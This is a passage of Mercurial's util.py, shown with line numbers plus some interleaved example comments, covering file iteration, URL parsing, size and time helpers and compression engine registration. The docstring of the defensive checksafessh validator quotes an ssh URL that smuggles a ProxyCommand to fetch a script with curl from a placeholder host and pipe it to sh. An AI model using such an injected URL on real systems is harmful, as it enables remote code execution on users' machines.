2579 2582 #
2580 2583 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2581 2584 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2582 2585 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2583 2586 # fp.__iter__ but not other fp.read* methods.
2584 2587 #
2585 2588 # On modern systems like Linux, the "read" syscall cannot be interrupted
2586 2589 # when reading "fast" files like on-disk files. So the EINTR issue only
2587 2590 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2588 2591 # files approximately as "fast" files and use the fast (unsafe) code path,
2589 2592 # to minimize the performance impact.
2590 2593 if sys.version_info >= (2, 7, 4):
2591 2594 # fp.readline deals with EINTR correctly, use it as a workaround.
2592 2595 def _safeiterfile(fp):
2593 2596 return iter(fp.readline, '')
2594 2597 else:
2595 2598 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2596 2599 # note: this may block longer than necessary because of bufsize.
2597 2600 def _safeiterfile(fp, bufsize=4096):
2598 2601 fd = fp.fileno()
2599 2602 line = ''
2600 2603 while True:
2601 2604 try:
2602 2605 buf = os.read(fd, bufsize)
2603 2606 except OSError as ex:
2604 2607 # os.read only raises EINTR before any data is read
2605 2608 if ex.errno == errno.EINTR:
2606 2609 continue
2607 2610 else:
2608 2611 raise
2609 2612 line += buf
2610 2613 if '\n' in buf:
2611 2614 parts = line.splitlines(True)
2612 2615 line = ''
2613 2616 for l in parts:
2614 2617 if l[-1] == '\n':
2615 2618 yield l
2616 2619 else:
2617 2620 line = l
2618 2621 if not buf:
2619 2622 break
2620 2623 if line:
2621 2624 yield line
2622 2625
2623 2626 def iterfile(fp):
2624 2627 fastpath = True
2625 2628 if type(fp) is file:
2626 2629 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2627 2630 if fastpath:
2628 2631 return fp
2629 2632 else:
2630 2633 return _safeiterfile(fp)
2631 2634 else:
2632 2635 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2633 2636 def iterfile(fp):
2634 2637 return fp
2635 2638
2636 2639 def iterlines(iterator):
2637 2640 for chunk in iterator:
2638 2641 for line in chunk.splitlines():
2639 2642 yield line
2640 2643
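# For example:
#
#   >>> list(iterlines([b'a\nb', b'c\nd\n']))
#   ['a', 'b', 'c', 'd']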
2641 2644 def expandpath(path):
2642 2645 return os.path.expanduser(os.path.expandvars(path))
2643 2646
2644 2647 def hgcmd():
2645 2648 """Return the command used to execute current hg
2646 2649
2647 2650 This is different from hgexecutable() because on Windows we want
2648 2651 to avoid things opening new shell windows like batch files, so we
2649 2652 get either the python call or current executable.
2650 2653 """
2651 2654 if mainfrozen():
2652 2655 if getattr(sys, 'frozen', None) == 'macosx_app':
2653 2656 # Env variable set by py2app
2654 2657 return [encoding.environ['EXECUTABLEPATH']]
2655 2658 else:
2656 2659 return [pycompat.sysexecutable]
2657 2660 return gethgcmd()
2658 2661
2659 2662 def rundetached(args, condfn):
2660 2663 """Execute the argument list in a detached process.
2661 2664
2662 2665 condfn is a callable which is called repeatedly and should return
2663 2666 True once the child process is known to have started successfully.
2664 2667 At this point, the child process PID is returned. If the child
2665 2668 process fails to start or finishes before condfn() evaluates to
2666 2669 True, -1 is returned.
2667 2670 """
2668 2671 # Windows case is easier because the child process is either
2669 2672 # successfully starting and validating the condition or exiting
2670 2673 # on failure. We just poll on its PID. On Unix, if the child
2671 2674 # process fails to start, it will be left in a zombie state until
2672 2675 # the parent wait on it, which we cannot do since we expect a long
2673 2676 # running process on success. Instead we listen for SIGCHLD telling
2674 2677 # us our child process terminated.
2675 2678 terminated = set()
2676 2679 def handler(signum, frame):
2677 2680 terminated.add(os.wait())
2678 2681 prevhandler = None
2679 2682 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2680 2683 if SIGCHLD is not None:
2681 2684 prevhandler = signal.signal(SIGCHLD, handler)
2682 2685 try:
2683 2686 pid = spawndetached(args)
2684 2687 while not condfn():
2685 2688 if ((pid in terminated or not testpid(pid))
2686 2689 and not condfn()):
2687 2690 return -1
2688 2691 time.sleep(0.1)
2689 2692 return pid
2690 2693 finally:
2691 2694 if prevhandler is not None:
2692 2695 signal.signal(signal.SIGCHLD, prevhandler)
2693 2696
2694 2697 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2695 2698 """Return the result of interpolating items in the mapping into string s.
2696 2699
2697 2700 prefix is a single character string, or a two character string with
2698 2701 a backslash as the first character if the prefix needs to be escaped in
2699 2702 a regular expression.
2700 2703
2701 2704 fn is an optional function that will be applied to the replacement text
2702 2705 just before replacement.
2703 2706
2704 2707 escape_prefix is an optional flag that allows a doubled prefix to be
2705 2708 used as an escape for the prefix itself.
2706 2709 """
2707 2710 fn = fn or (lambda s: s)
2708 2711 patterns = '|'.join(mapping.keys())
2709 2712 if escape_prefix:
2710 2713 patterns += '|' + prefix
2711 2714 if len(prefix) > 1:
2712 2715 prefix_char = prefix[1:]
2713 2716 else:
2714 2717 prefix_char = prefix
2715 2718 mapping[prefix_char] = prefix_char
2716 2719 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2717 2720 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2718 2721
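# For example:
#
#   >>> interpolate(b'%', {b'foo': b'bar'}, b'%foo and %foo')
#   'bar and bar'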
2719 2722 def getport(port):
2720 2723 """Return the port for a given network service.
2721 2724
2722 2725 If port is an integer, it's returned as is. If it's a string, it's
2723 2726 looked up using socket.getservbyname(). If there's no matching
2724 2727 service, error.Abort is raised.
2725 2728 """
2726 2729 try:
2727 2730 return int(port)
2728 2731 except ValueError:
2729 2732 pass
2730 2733
2731 2734 try:
2732 2735 return socket.getservbyname(pycompat.sysstr(port))
2733 2736 except socket.error:
2734 2737 raise Abort(_("no port number associated with service '%s'") % port)
2735 2738
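# For example:
#
#   >>> getport(b'8080')
#   8080
#   >>> getport(b'http')    # via getservbyname(); 80 on typical systems
#   80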
2736 2739 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2737 2740 '0': False, 'no': False, 'false': False, 'off': False,
2738 2741 'never': False}
2739 2742
2740 2743 def parsebool(s):
2741 2744 """Parse s into a boolean.
2742 2745
2743 2746 If s is not a valid boolean, returns None.
2744 2747 """
2745 2748 return _booleans.get(s.lower(), None)
2746 2749
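# For example:
#
#   >>> parsebool(b'on'), parsebool(b'Never'), parsebool(b'maybe')
#   (True, False, None)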
2747 2750 _hextochr = dict((a + b, chr(int(a + b, 16)))
2748 2751 for a in string.hexdigits for b in string.hexdigits)
2749 2752
2750 2753 class url(object):
2751 2754 r"""Reliable URL parser.
2752 2755
2753 2756 This parses URLs and provides attributes for the following
2754 2757 components:
2755 2758
2756 2759 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2757 2760
2758 2761 Missing components are set to None. The only exception is
2759 2762 fragment, which is set to '' if present but empty.
2760 2763
2761 2764 If parsefragment is False, fragment is included in query. If
2762 2765 parsequery is False, query is included in path. If both are
2763 2766 False, both fragment and query are included in path.
2764 2767
2765 2768 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2766 2769
2767 2770 Note that for backward compatibility reasons, bundle URLs do not
2768 2771 take host names. That means 'bundle://../' has a path of '../'.
2769 2772
2770 2773 Examples:
2771 2774
2772 2775 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2773 2776 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2774 2777 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2775 2778 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2776 2779 >>> url(b'file:///home/joe/repo')
2777 2780 <url scheme: 'file', path: '/home/joe/repo'>
2778 2781 >>> url(b'file:///c:/temp/foo/')
2779 2782 <url scheme: 'file', path: 'c:/temp/foo/'>
2780 2783 >>> url(b'bundle:foo')
2781 2784 <url scheme: 'bundle', path: 'foo'>
2782 2785 >>> url(b'bundle://../foo')
2783 2786 <url scheme: 'bundle', path: '../foo'>
2784 2787 >>> url(br'c:\foo\bar')
2785 2788 <url path: 'c:\\foo\\bar'>
2786 2789 >>> url(br'\\blah\blah\blah')
2787 2790 <url path: '\\\\blah\\blah\\blah'>
2788 2791 >>> url(br'\\blah\blah\blah#baz')
2789 2792 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2790 2793 >>> url(br'file:///C:\users\me')
2791 2794 <url scheme: 'file', path: 'C:\\users\\me'>
2792 2795
2793 2796 Authentication credentials:
2794 2797
2795 2798 >>> url(b'ssh://joe:xyz@x/repo')
2796 2799 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2797 2800 >>> url(b'ssh://joe@x/repo')
2798 2801 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2799 2802
2800 2803 Query strings and fragments:
2801 2804
2802 2805 >>> url(b'http://host/a?b#c')
2803 2806 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2804 2807 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2805 2808 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2806 2809
2807 2810 Empty path:
2808 2811
2809 2812 >>> url(b'')
2810 2813 <url path: ''>
2811 2814 >>> url(b'#a')
2812 2815 <url path: '', fragment: 'a'>
2813 2816 >>> url(b'http://host/')
2814 2817 <url scheme: 'http', host: 'host', path: ''>
2815 2818 >>> url(b'http://host/#a')
2816 2819 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2817 2820
2818 2821 Only scheme:
2819 2822
2820 2823 >>> url(b'http:')
2821 2824 <url scheme: 'http'>
2822 2825 """
2823 2826
2824 2827 _safechars = "!~*'()+"
2825 2828 _safepchars = "/!~*'()+:\\"
2826 2829 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2827 2830
2828 2831 def __init__(self, path, parsequery=True, parsefragment=True):
2829 2832 # We slowly chomp away at path until we have only the path left
2830 2833 self.scheme = self.user = self.passwd = self.host = None
2831 2834 self.port = self.path = self.query = self.fragment = None
2832 2835 self._localpath = True
2833 2836 self._hostport = ''
2834 2837 self._origpath = path
2835 2838
2836 2839 if parsefragment and '#' in path:
2837 2840 path, self.fragment = path.split('#', 1)
2838 2841
2839 2842 # special case for Windows drive letters and UNC paths
2840 2843 if hasdriveletter(path) or path.startswith('\\\\'):
2841 2844 self.path = path
2842 2845 return
2843 2846
2844 2847 # For compatibility reasons, we can't handle bundle paths as
2845 2848 # normal URLS
2846 2849 if path.startswith('bundle:'):
2847 2850 self.scheme = 'bundle'
2848 2851 path = path[7:]
2849 2852 if path.startswith('//'):
2850 2853 path = path[2:]
2851 2854 self.path = path
2852 2855 return
2853 2856
2854 2857 if self._matchscheme(path):
2855 2858 parts = path.split(':', 1)
2856 2859 if parts[0]:
2857 2860 self.scheme, path = parts
2858 2861 self._localpath = False
2859 2862
2860 2863 if not path:
2861 2864 path = None
2862 2865 if self._localpath:
2863 2866 self.path = ''
2864 2867 return
2865 2868 else:
2866 2869 if self._localpath:
2867 2870 self.path = path
2868 2871 return
2869 2872
2870 2873 if parsequery and '?' in path:
2871 2874 path, self.query = path.split('?', 1)
2872 2875 if not path:
2873 2876 path = None
2874 2877 if not self.query:
2875 2878 self.query = None
2876 2879
2877 2880 # // is required to specify a host/authority
2878 2881 if path and path.startswith('//'):
2879 2882 parts = path[2:].split('/', 1)
2880 2883 if len(parts) > 1:
2881 2884 self.host, path = parts
2882 2885 else:
2883 2886 self.host = parts[0]
2884 2887 path = None
2885 2888 if not self.host:
2886 2889 self.host = None
2887 2890 # path of file:///d is /d
2888 2891 # path of file:///d:/ is d:/, not /d:/
2889 2892 if path and not hasdriveletter(path):
2890 2893 path = '/' + path
2891 2894
2892 2895 if self.host and '@' in self.host:
2893 2896 self.user, self.host = self.host.rsplit('@', 1)
2894 2897 if ':' in self.user:
2895 2898 self.user, self.passwd = self.user.split(':', 1)
2896 2899 if not self.host:
2897 2900 self.host = None
2898 2901
2899 2902 # Don't split on colons in IPv6 addresses without ports
2900 2903 if (self.host and ':' in self.host and
2901 2904 not (self.host.startswith('[') and self.host.endswith(']'))):
2902 2905 self._hostport = self.host
2903 2906 self.host, self.port = self.host.rsplit(':', 1)
2904 2907 if not self.host:
2905 2908 self.host = None
2906 2909
2907 2910 if (self.host and self.scheme == 'file' and
2908 2911 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2909 2912 raise error.Abort(_('file:// URLs can only refer to localhost'))
2910 2913
2911 2914 self.path = path
2912 2915
2913 2916 # leave the query string escaped
2914 2917 for a in ('user', 'passwd', 'host', 'port',
2915 2918 'path', 'fragment'):
2916 2919 v = getattr(self, a)
2917 2920 if v is not None:
2918 2921 setattr(self, a, urlreq.unquote(v))
2919 2922
2920 2923 @encoding.strmethod
2921 2924 def __repr__(self):
2922 2925 attrs = []
2923 2926 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2924 2927 'query', 'fragment'):
2925 2928 v = getattr(self, a)
2926 2929 if v is not None:
2927 2930 attrs.append('%s: %r' % (a, v))
2928 2931 return '<url %s>' % ', '.join(attrs)
2929 2932
2930 2933 def __bytes__(self):
2931 2934 r"""Join the URL's components back into a URL string.
2932 2935
2933 2936 Examples:
2934 2937
2935 2938 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2936 2939 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2937 2940 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2938 2941 'http://user:pw@host:80/?foo=bar&baz=42'
2939 2942 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2940 2943 'http://user:pw@host:80/?foo=bar%3dbaz'
2941 2944 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2942 2945 'ssh://user:pw@[::1]:2200//home/joe#'
2943 2946 >>> bytes(url(b'http://localhost:80//'))
2944 2947 'http://localhost:80//'
2945 2948 >>> bytes(url(b'http://localhost:80/'))
2946 2949 'http://localhost:80/'
2947 2950 >>> bytes(url(b'http://localhost:80'))
2948 2951 'http://localhost:80/'
2949 2952 >>> bytes(url(b'bundle:foo'))
2950 2953 'bundle:foo'
2951 2954 >>> bytes(url(b'bundle://../foo'))
2952 2955 'bundle:../foo'
2953 2956 >>> bytes(url(b'path'))
2954 2957 'path'
2955 2958 >>> bytes(url(b'file:///tmp/foo/bar'))
2956 2959 'file:///tmp/foo/bar'
2957 2960 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2958 2961 'file:///c:/tmp/foo/bar'
2959 2962 >>> print(url(br'bundle:foo\bar'))
2960 2963 bundle:foo\bar
2961 2964 >>> print(url(br'file:///D:\data\hg'))
2962 2965 file:///D:\data\hg
2963 2966 """
2964 2967 if self._localpath:
2965 2968 s = self.path
2966 2969 if self.scheme == 'bundle':
2967 2970 s = 'bundle:' + s
2968 2971 if self.fragment:
2969 2972 s += '#' + self.fragment
2970 2973 return s
2971 2974
2972 2975 s = self.scheme + ':'
2973 2976 if self.user or self.passwd or self.host:
2974 2977 s += '//'
2975 2978 elif self.scheme and (not self.path or self.path.startswith('/')
2976 2979 or hasdriveletter(self.path)):
2977 2980 s += '//'
2978 2981 if hasdriveletter(self.path):
2979 2982 s += '/'
2980 2983 if self.user:
2981 2984 s += urlreq.quote(self.user, safe=self._safechars)
2982 2985 if self.passwd:
2983 2986 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2984 2987 if self.user or self.passwd:
2985 2988 s += '@'
2986 2989 if self.host:
2987 2990 if not (self.host.startswith('[') and self.host.endswith(']')):
2988 2991 s += urlreq.quote(self.host)
2989 2992 else:
2990 2993 s += self.host
2991 2994 if self.port:
2992 2995 s += ':' + urlreq.quote(self.port)
2993 2996 if self.host:
2994 2997 s += '/'
2995 2998 if self.path:
2996 2999 # TODO: similar to the query string, we should not unescape the
2997 3000 # path when we store it, the path might contain '%2f' = '/',
2998 3001 # which we should *not* escape.
2999 3002 s += urlreq.quote(self.path, safe=self._safepchars)
3000 3003 if self.query:
3001 3004 # we store the query in escaped form.
3002 3005 s += '?' + self.query
3003 3006 if self.fragment is not None:
3004 3007 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3005 3008 return s
3006 3009
3007 3010 __str__ = encoding.strmethod(__bytes__)
3008 3011
3009 3012 def authinfo(self):
3010 3013 user, passwd = self.user, self.passwd
3011 3014 try:
3012 3015 self.user, self.passwd = None, None
3013 3016 s = bytes(self)
3014 3017 finally:
3015 3018 self.user, self.passwd = user, passwd
3016 3019 if not self.user:
3017 3020 return (s, None)
3018 3021 # authinfo[1] is passed to urllib2 password manager, and its
3019 3022 # URIs must not contain credentials. The host is passed in the
3020 3023 # URIs list because Python < 2.4.3 uses only that to search for
3021 3024 # a password.
3022 3025 return (s, (None, (s, self.host),
3023 3026 self.user, self.passwd or ''))
3024 3027
3025 3028 def isabs(self):
3026 3029 if self.scheme and self.scheme != 'file':
3027 3030 return True # remote URL
3028 3031 if hasdriveletter(self.path):
3029 3032 return True # absolute for our purposes - can't be joined()
3030 3033 if self.path.startswith(br'\\'):
3031 3034 return True # Windows UNC path
3032 3035 if self.path.startswith('/'):
3033 3036 return True # POSIX-style
3034 3037 return False
3035 3038
3036 3039 def localpath(self):
3037 3040 if self.scheme == 'file' or self.scheme == 'bundle':
3038 3041 path = self.path or '/'
3039 3042 # For Windows, we need to promote hosts containing drive
3040 3043 # letters to paths with drive letters.
3041 3044 if hasdriveletter(self._hostport):
3042 3045 path = self._hostport + '/' + self.path
3043 3046 elif (self.host is not None and self.path
3044 3047 and not hasdriveletter(path)):
3045 3048 path = '/' + path
3046 3049 return path
3047 3050 return self._origpath
3048 3051
3049 3052 def islocal(self):
3050 3053 '''whether localpath will return something that posixfile can open'''
3051 3054 return (not self.scheme or self.scheme == 'file'
3052 3055 or self.scheme == 'bundle')
3053 3056
3054 3057 def hasscheme(path):
3055 3058 return bool(url(path).scheme)
3056 3059
3057 3060 def hasdriveletter(path):
3058 3061 return path and path[1:2] == ':' and path[0:1].isalpha()
3059 3062
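# For example:
#
#   >>> hasdriveletter(b'c:\\temp'), hasdriveletter(b'/tmp')
#   (True, False)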
3060 3063 def urllocalpath(path):
3061 3064 return url(path, parsequery=False, parsefragment=False).localpath()
3062 3065
3063 3066 def checksafessh(path):
3064 3067 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3065 3068
3066 3069 This is a sanity check for ssh urls. ssh will parse the first item as
3067 3070 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3068 3071 Let's prevent these potentially exploited urls entirely and warn the
3069 3072 user.
3070 3073
3071 3074 Raises an error.Abort when the url is unsafe.
3072 3075 """
3073 3076 path = urlreq.unquote(path)
3074 3077 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3075 3078 raise error.Abort(_('potentially unsafe url: %r') %
3076 3079 (path,))
3077 3080
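# For example, an option-injecting url is rejected:
#
#   >>> checksafessh(b'ssh://-oProxyCommand=evil/path')
#   Traceback (most recent call last):
#     ...
#   Abort: potentially unsafe url: 'ssh://-oProxyCommand=evil/path'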
3078 3081 def hidepassword(u):
3079 3082 '''hide user credential in a url string'''
3080 3083 u = url(u)
3081 3084 if u.passwd:
3082 3085 u.passwd = '***'
3083 3086 return bytes(u)
3084 3087
3085 3088 def removeauth(u):
3086 3089 '''remove all authentication information from a url string'''
3087 3090 u = url(u)
3088 3091 u.user = u.passwd = None
3089 3092 return bytes(u)
3090 3093
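# For example:
#
#   >>> hidepassword(b'http://joe:secret@example.com/repo')
#   'http://joe:***@example.com/repo'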
3091 3094 timecount = unitcountfn(
3092 3095 (1, 1e3, _('%.0f s')),
3093 3096 (100, 1, _('%.1f s')),
3094 3097 (10, 1, _('%.2f s')),
3095 3098 (1, 1, _('%.3f s')),
3096 3099 (100, 0.001, _('%.1f ms')),
3097 3100 (10, 0.001, _('%.2f ms')),
3098 3101 (1, 0.001, _('%.3f ms')),
3099 3102 (100, 0.000001, _('%.1f us')),
3100 3103 (10, 0.000001, _('%.2f us')),
3101 3104 (1, 0.000001, _('%.3f us')),
3102 3105 (100, 0.000000001, _('%.1f ns')),
3103 3106 (10, 0.000000001, _('%.2f ns')),
3104 3107 (1, 0.000000001, _('%.3f ns')),
3105 3108 )
3106 3109
3107 3110 _timenesting = [0]
3108 3111
3109 3112 def timed(func):
3110 3113 '''Report the execution time of a function call to stderr.
3111 3114
3112 3115 During development, use as a decorator when you need to measure
3113 3116 the cost of a function, e.g. as follows:
3114 3117
3115 3118 @util.timed
3116 3119 def foo(a, b, c):
3117 3120 pass
3118 3121 '''
3119 3122
3120 3123 def wrapper(*args, **kwargs):
3121 3124 start = timer()
3122 3125 indent = 2
3123 3126 _timenesting[0] += indent
3124 3127 try:
3125 3128 return func(*args, **kwargs)
3126 3129 finally:
3127 3130 elapsed = timer() - start
3128 3131 _timenesting[0] -= indent
3129 3132 stderr.write('%s%s: %s\n' %
3130 3133 (' ' * _timenesting[0], func.__name__,
3131 3134 timecount(elapsed)))
3132 3135 return wrapper
3133 3136
3134 3137 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3135 3138 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3136 3139
3137 3140 def sizetoint(s):
3138 3141 '''Convert a space specifier to a byte count.
3139 3142
3140 3143 >>> sizetoint(b'30')
3141 3144 30
3142 3145 >>> sizetoint(b'2.2kb')
3143 3146 2252
3144 3147 >>> sizetoint(b'6M')
3145 3148 6291456
3146 3149 '''
3147 3150 t = s.strip().lower()
3148 3151 try:
3149 3152 for k, u in _sizeunits:
3150 3153 if t.endswith(k):
3151 3154 return int(float(t[:-len(k)]) * u)
3152 3155 return int(t)
3153 3156 except ValueError:
3154 3157 raise error.ParseError(_("couldn't parse size: %s") % s)
3155 3158
3156 3159 class hooks(object):
3157 3160 '''A collection of hook functions that can be used to extend a
3158 3161 function's behavior. Hooks are called in lexicographic order,
3159 3162 based on the names of their sources.'''
3160 3163
3161 3164 def __init__(self):
3162 3165 self._hooks = []
3163 3166
3164 3167 def add(self, source, hook):
3165 3168 self._hooks.append((source, hook))
3166 3169
3167 3170 def __call__(self, *args):
3168 3171 self._hooks.sort(key=lambda x: x[0])
3169 3172 results = []
3170 3173 for source, hook in self._hooks:
3171 3174 results.append(hook(*args))
3172 3175 return results
3173 3176
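# For example, hooks run in lexicographic order of their source names:
#
#   >>> h = hooks()
#   >>> h.add(b'zz-source', lambda x: x * 2)
#   >>> h.add(b'aa-source', lambda x: x + 1)
#   >>> h(3)
#   [4, 6]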
3174 3177 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3175 3178 '''Yields lines for a nicely formatted stacktrace.
3176 3179 Skips the 'skip' last entries, then returns the last 'depth' entries.
3177 3180 Each file+linenumber is formatted according to fileline.
3178 3181 Each line is formatted according to line.
3179 3182 If line is None, it yields:
3180 3183 length of longest filepath+line number,
3181 3184 filepath+linenumber,
3182 3185 function
3183 3186
3184 3187 Not to be used in production code, but very convenient while developing.
3185 3188 '''
3186 3189 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3187 3190 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3188 3191 ][-depth:]
3189 3192 if entries:
3190 3193 fnmax = max(len(entry[0]) for entry in entries)
3191 3194 for fnln, func in entries:
3192 3195 if line is None:
3193 3196 yield (fnmax, fnln, func)
3194 3197 else:
3195 3198 yield line % (fnmax, fnln, func)
3196 3199
3197 3200 def debugstacktrace(msg='stacktrace', skip=0,
3198 3201 f=stderr, otherf=stdout, depth=0):
3199 3202 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3200 3203 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3201 3204 By default it will flush stdout first.
3202 3205 It can be used everywhere and intentionally does not require an ui object.
3203 3206 Not to be used in production code, but very convenient while developing.
3204 3207 '''
3205 3208 if otherf:
3206 3209 otherf.flush()
3207 3210 f.write('%s at:\n' % msg.rstrip())
3208 3211 for line in getstackframes(skip + 1, depth=depth):
3209 3212 f.write(line)
3210 3213 f.flush()
3211 3214
3212 3215 class dirs(object):
3213 3216 '''a multiset of directory names from a dirstate or manifest'''
3214 3217
3215 3218 def __init__(self, map, skip=None):
3216 3219 self._dirs = {}
3217 3220 addpath = self.addpath
3218 3221 if safehasattr(map, 'iteritems') and skip is not None:
3219 3222 for f, s in map.iteritems():
3220 3223 if s[0] != skip:
3221 3224 addpath(f)
3222 3225 else:
3223 3226 for f in map:
3224 3227 addpath(f)
3225 3228
3226 3229 def addpath(self, path):
3227 3230 dirs = self._dirs
3228 3231 for base in finddirs(path):
3229 3232 if base in dirs:
3230 3233 dirs[base] += 1
3231 3234 return
3232 3235 dirs[base] = 1
3233 3236
3234 3237 def delpath(self, path):
3235 3238 dirs = self._dirs
3236 3239 for base in finddirs(path):
3237 3240 if dirs[base] > 1:
3238 3241 dirs[base] -= 1
3239 3242 return
3240 3243 del dirs[base]
3241 3244
3242 3245 def __iter__(self):
3243 3246 return iter(self._dirs)
3244 3247
3245 3248 def __contains__(self, d):
3246 3249 return d in self._dirs
3247 3250
3248 3251 if safehasattr(parsers, 'dirs'):
3249 3252 dirs = parsers.dirs
3250 3253
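# Usage sketch (intended to hold for either the pure Python or the C
# implementation of 'dirs'):
#
#   >>> d = dirs([b'a/b/c', b'a/d'])
#   >>> sorted(d)
#   ['a', 'a/b']
#   >>> b'a/b' in d
#   True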
3251 3254 def finddirs(path):
3252 3255 pos = path.rfind('/')
3253 3256 while pos != -1:
3254 3257 yield path[:pos]
3255 3258 pos = path.rfind('/', 0, pos)
3256 3259
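# For example:
#
#   >>> list(finddirs(b'a/b/c'))
#   ['a/b', 'a']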
3257 3260 # compression code
3258 3261
3259 3262 SERVERROLE = 'server'
3260 3263 CLIENTROLE = 'client'
3261 3264
3262 3265 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3263 3266 (u'name', u'serverpriority',
3264 3267 u'clientpriority'))
3265 3268
3266 3269 class compressormanager(object):
3267 3270 """Holds registrations of various compression engines.
3268 3271
3269 3272 This class essentially abstracts the differences between compression
3270 3273 engines to allow new compression formats to be added easily, possibly from
3271 3274 extensions.
3272 3275
3273 3276 Compressors are registered against the global instance by calling its
3274 3277 ``register()`` method.
3275 3278 """
3276 3279 def __init__(self):
3277 3280 self._engines = {}
3278 3281 # Bundle spec human name to engine name.
3279 3282 self._bundlenames = {}
3280 3283 # Internal bundle identifier to engine name.
3281 3284 self._bundletypes = {}
3282 3285 # Revlog header to engine name.
3283 3286 self._revlogheaders = {}
3284 3287 # Wire proto identifier to engine name.
3285 3288 self._wiretypes = {}
3286 3289
3287 3290 def __getitem__(self, key):
3288 3291 return self._engines[key]
3289 3292
3290 3293 def __contains__(self, key):
3291 3294 return key in self._engines
3292 3295
3293 3296 def __iter__(self):
3294 3297 return iter(self._engines.keys())
3295 3298
3296 3299 def register(self, engine):
3297 3300 """Register a compression engine with the manager.
3298 3301
3299 3302 The argument must be a ``compressionengine`` instance.
3300 3303 """
3301 3304 if not isinstance(engine, compressionengine):
3302 3305 raise ValueError(_('argument must be a compressionengine'))
3303 3306
3304 3307 name = engine.name()
3305 3308
3306 3309 if name in self._engines:
3307 3310 raise error.Abort(_('compression engine %s already registered') %
3308 3311 name)
3309 3312
3310 3313 bundleinfo = engine.bundletype()
3311 3314 if bundleinfo:
3312 3315 bundlename, bundletype = bundleinfo
3313 3316
3314 3317 if bundlename in self._bundlenames:
3315 3318 raise error.Abort(_('bundle name %s already registered') %
3316 3319 bundlename)
3317 3320 if bundletype in self._bundletypes:
3318 3321 raise error.Abort(_('bundle type %s already registered by %s') %
3319 3322 (bundletype, self._bundletypes[bundletype]))
3320 3323
            # Only register an external-facing name if one was declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle name isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
